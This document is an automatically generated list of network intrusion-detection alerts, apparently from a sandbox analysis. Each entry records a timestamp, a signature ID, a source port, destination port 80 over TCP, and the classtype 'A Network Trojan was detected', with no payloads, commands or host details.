                  Timestamp:05/23/24-20:17:38.077506
                  SID:2021641
                  Source Port:49166
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:43.183162
                  SID:2825766
                  Source Port:49170
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:27.512891
                  SID:2021641
                  Source Port:49211
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.981231
                  SID:2021641
                  Source Port:49222
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:47.208604
                  SID:2021641
                  Source Port:49174
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.984952
                  SID:2025381
                  Source Port:49183
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:58.594043
                  SID:2024313
                  Source Port:49240
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:48.088333
                  SID:2025381
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:06.045591
                  SID:2024313
                  Source Port:49192
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:19.988815
                  SID:2024313
                  Source Port:49203
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:58.820260
                  SID:2025381
                  Source Port:49185
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:19.988815
                  SID:2024318
                  Source Port:49203
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:10.741295
                  SID:2025381
                  Source Port:49253
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.107766
                  SID:2825766
                  Source Port:49193
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:20.882874
                  SID:2024318
                  Source Port:49204
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:58.594043
                  SID:2024318
                  Source Port:49240
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:06.045591
                  SID:2024318
                  Source Port:49192
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:46.517579
                  SID:2021641
                  Source Port:49227
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:08.948107
                  SID:2021641
                  Source Port:49195
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:20.882874
                  SID:2024313
                  Source Port:49204
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:57.792134
                  SID:2024318
                  Source Port:49239
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.957362
                  SID:2825766
                  Source Port:49215
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:40.814233
                  SID:2025381
                  Source Port:49168
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:08.948107
                  SID:2825766
                  Source Port:49195
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:49.167216
                  SID:2025381
                  Source Port:49230
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.909324
                  SID:2025381
                  Source Port:49238
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:51.088057
                  SID:2025381
                  Source Port:49232
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:49.147570
                  SID:2025381
                  Source Port:49176
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.976087
                  SID:2021641
                  Source Port:49202
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:15.184596
                  SID:2021641
                  Source Port:49258
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:09.860809
                  SID:2025381
                  Source Port:49196
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.989686
                  SID:2825766
                  Source Port:49194
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:26.597772
                  SID:2025381
                  Source Port:49210
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:21.836224
                  SID:2021641
                  Source Port:49205
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:09.943896
                  SID:2021641
                  Source Port:49252
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:31.712532
                  SID:2025381
                  Source Port:49216
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:04.176231
                  SID:2021641
                  Source Port:49191
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:02.368807
                  SID:2025381
                  Source Port:49189
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:52.425128
                  SID:2024313
                  Source Port:49233
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.957362
                  SID:2021641
                  Source Port:49215
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:52.425128
                  SID:2024318
                  Source Port:49233
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:01.557933
                  SID:2021641
                  Source Port:49188
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:59.837093
                  SID:2825766
                  Source Port:49186
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:06.045591
                  SID:2825766
                  Source Port:49192
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:13.398917
                  SID:2825766
                  Source Port:49256
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.058542
                  SID:2825766
                  Source Port:49177
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:23.674890
                  SID:2024318
                  Source Port:49207
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:04.226888
                  SID:2024318
                  Source Port:49246
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:24.566045
                  SID:2825766
                  Source Port:49208
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:51.806006
                  SID:2021641
                  Source Port:49179
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:04.226888
                  SID:2024313
                  Source Port:49246
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.944456
                  SID:2024318
                  Source Port:49178
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:09.943896
                  SID:2825766
                  Source Port:49252
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:18.441021
                  SID:2025381
                  Source Port:49262
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:46.332436
                  SID:2025381
                  Source Port:49173
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.020535
                  SID:2825766
                  Source Port:49249
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:03.278750
                  SID:2024313
                  Source Port:49190
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:48.359257
                  SID:2025381
                  Source Port:49229
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:59.521470
                  SID:2025381
                  Source Port:49241
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.944456
                  SID:2024313
                  Source Port:49178
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:59.837093
                  SID:2021641
                  Source Port:49186
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:23.674890
                  SID:2024313
                  Source Port:49207
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:36.624490
                  SID:2025381
                  Source Port:49165
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:28.376454
                  SID:2825766
                  Source Port:49212
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:35.132025
                  SID:2825766
                  Source Port:49164
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:44.106859
                  SID:2025381
                  Source Port:49171
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:43.183162
                  SID:2024318
                  Source Port:49170
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:03.278750
                  SID:2024318
                  Source Port:49190
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.020535
                  SID:2021641
                  Source Port:49249
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:17.653379
                  SID:2021641
                  Source Port:49261
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:53.400223
                  SID:2025381
                  Source Port:49234
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:43.183162
                  SID:2024313
                  Source Port:49170
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.882044
                  SID:2024313
                  Source Port:49260
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:46.332436
                  SID:2825766
                  Source Port:49173
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:46.517579
                  SID:2025381
                  Source Port:49227
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.882044
                  SID:2024318
                  Source Port:49260
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:15.184596
                  SID:2025381
                  Source Port:49258
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:58.594043
                  SID:2825766
                  Source Port:49240
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:01.557933
                  SID:2825766
                  Source Port:49188
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.210686
                  SID:2825766
                  Source Port:49221
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:47.208604
                  SID:2025381
                  Source Port:49174
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:04.176231
                  SID:2025381
                  Source Port:49191
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:16.270962
                  SID:2021641
                  Source Port:49199
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:51.088057
                  SID:2021641
                  Source Port:49232
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.984952
                  SID:2024313
                  Source Port:49183
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:00.736741
                  SID:2024313
                  Source Port:49187
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:23.674890
                  SID:2025381
                  Source Port:49207
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.093323
                  SID:2021641
                  Source Port:49237
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:06.045591
                  SID:2025381
                  Source Port:49192
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:17.156368
                  SID:2825766
                  Source Port:49200
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:00.736741
                  SID:2024318
                  Source Port:49187
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.984952
                  SID:2024318
                  Source Port:49183
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:06.064261
                  SID:2025381
                  Source Port:49248
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:38.077506
                  SID:2825766
                  Source Port:49166
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.909324
                  SID:2825766
                  Source Port:49238
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:43.784658
                  SID:2021641
                  Source Port:49224
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:20.882874
                  SID:2025381
                  Source Port:49204
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:48.359257
                  SID:2825766
                  Source Port:49229
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:53.400223
                  SID:2021641
                  Source Port:49234
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.020535
                  SID:2024313
                  Source Port:49249
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.976087
                  SID:2825766
                  Source Port:49202
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:25.484710
                  SID:2024318
                  Source Port:49209
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:29.294238
                  SID:2021641
                  Source Port:49213
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:36.624490
                  SID:2825766
                  Source Port:49165
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:49.147570
                  SID:2021641
                  Source Port:49176
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:04.226888
                  SID:2021641
                  Source Port:49246
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:18.441021
                  SID:2021641
                  Source Port:49262
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:47.208604
                  SID:2825766
                  Source Port:49174
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:38.560340
                  SID:2025381
                  Source Port:49218
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:48.088333
                  SID:2024318
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:58.820260
                  SID:2024313
                  Source Port:49185
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:44.106859
                  SID:2825766
                  Source Port:49171
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:48.088333
                  SID:2024313
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:58.820260
                  SID:2024318
                  Source Port:49185
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:42.915752
                  SID:2025381
                  Source Port:49223
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:59.837093
                  SID:2024318
                  Source Port:49186
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.888746
                  SID:2024318
                  Source Port:49250
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:03.278750
                  SID:2021641
                  Source Port:49190
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.944456
                  SID:2825766
                  Source Port:49178
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:59.837093
                  SID:2024313
                  Source Port:49186
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:45.625277
                  SID:2021641
                  Source Port:49226
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.888746
                  SID:2024313
                  Source Port:49250
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:27.512891
                  SID:2825766
                  Source Port:49211
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:25.484710
                  SID:2024313
                  Source Port:49209
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.020535
                  SID:2024318
                  Source Port:49249
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:02.368807
                  SID:2021641
                  Source Port:49189
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:08.863871
                  SID:2825766
                  Source Port:49251
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:35.132025
                  SID:2025381
                  Source Port:49164
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:05.135747
                  SID:2021641
                  Source Port:49247
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:45.155201
                  SID:2024313
                  Source Port:49172
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:24.566045
                  SID:2024318
                  Source Port:49208
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:43.183162
                  SID:2021641
                  Source Port:49170
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:45.155201
                  SID:2024318
                  Source Port:49172
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:14.278026
                  SID:2021641
                  Source Port:49257
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.079750
                  SID:2021641
                  Source Port:49201
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:24.566045
                  SID:2024313
                  Source Port:49208
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:29.294238
                  SID:2825766
                  Source Port:49213
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:12.597934
                  SID:2025381
                  Source Port:49255
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.989686
                  SID:2025381
                  Source Port:49194
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:39.381191
                  SID:2024313
                  Source Port:49219
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:49.167216
                  SID:2024318
                  Source Port:49230
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:54.312724
                  SID:2021641
                  Source Port:49235
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:50.061779
                  SID:2825766
                  Source Port:49231
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:57.920775
                  SID:2025381
                  Source Port:49184
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:59.521470
                  SID:2024318
                  Source Port:49241
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:26.597772
                  SID:2825766
                  Source Port:49210
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:49.167216
                  SID:2024313
                  Source Port:49230
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:59.521470
                  SID:2024313
                  Source Port:49241
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.098368
                  SID:2025381
                  Source Port:49214
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:11.675767
                  SID:2021641
                  Source Port:49254
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:36.624490
                  SID:2021641
                  Source Port:49165
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:17.156368
                  SID:2021641
                  Source Port:49200
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.058542
                  SID:2024313
                  Source Port:49177
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:39.381191
                  SID:2024318
                  Source Port:49219
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:55.233506
                  SID:2021641
                  Source Port:49236
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:13.398917
                  SID:2025381
                  Source Port:49256
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.058542
                  SID:2024318
                  Source Port:49177
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:11.714251
                  SID:2024313
                  Source Port:49198
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:11.714251
                  SID:2024318
                  Source Port:49198
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:52.425128
                  SID:2025381
                  Source Port:49233
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.957362
                  SID:2025381
                  Source Port:49215
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:16.270962
                  SID:2825766
                  Source Port:49199
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:39.511374
                  SID:2025381
                  Source Port:49167
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:51.088057
                  SID:2825766
                  Source Port:49232
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:47.441038
                  SID:2024318
                  Source Port:49228
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.107766
                  SID:2024313
                  Source Port:49193
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:37.677256
                  SID:2025381
                  Source Port:49217
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:50.061779
                  SID:2021641
                  Source Port:49231
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:09.860809
                  SID:2024313
                  Source Port:49196
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:09.860809
                  SID:2024318
                  Source Port:49196
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.049434
                  SID:2024318
                  Source Port:49182
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:40.275029
                  SID:2024313
                  Source Port:49220
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.079750
                  SID:2825766
                  Source Port:49201
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:40.275029
                  SID:2024318
                  Source Port:49220
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:14.278026
                  SID:2825766
                  Source Port:49257
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:22.772748
                  SID:2021641
                  Source Port:49206
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.107766
                  SID:2024318
                  Source Port:49193
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.049434
                  SID:2024313
                  Source Port:49182
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.981231
                  SID:2024318
                  Source Port:49222
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:55.233506
                  SID:2825766
                  Source Port:49236
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:52.694696
                  SID:2024313
                  Source Port:49180
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.981231
                  SID:2024313
                  Source Port:49222
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:40.814233
                  SID:2024318
                  Source Port:49168
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:19.988815
                  SID:2825766
                  Source Port:49203
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:40.814233
                  SID:2024313
                  Source Port:49168
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
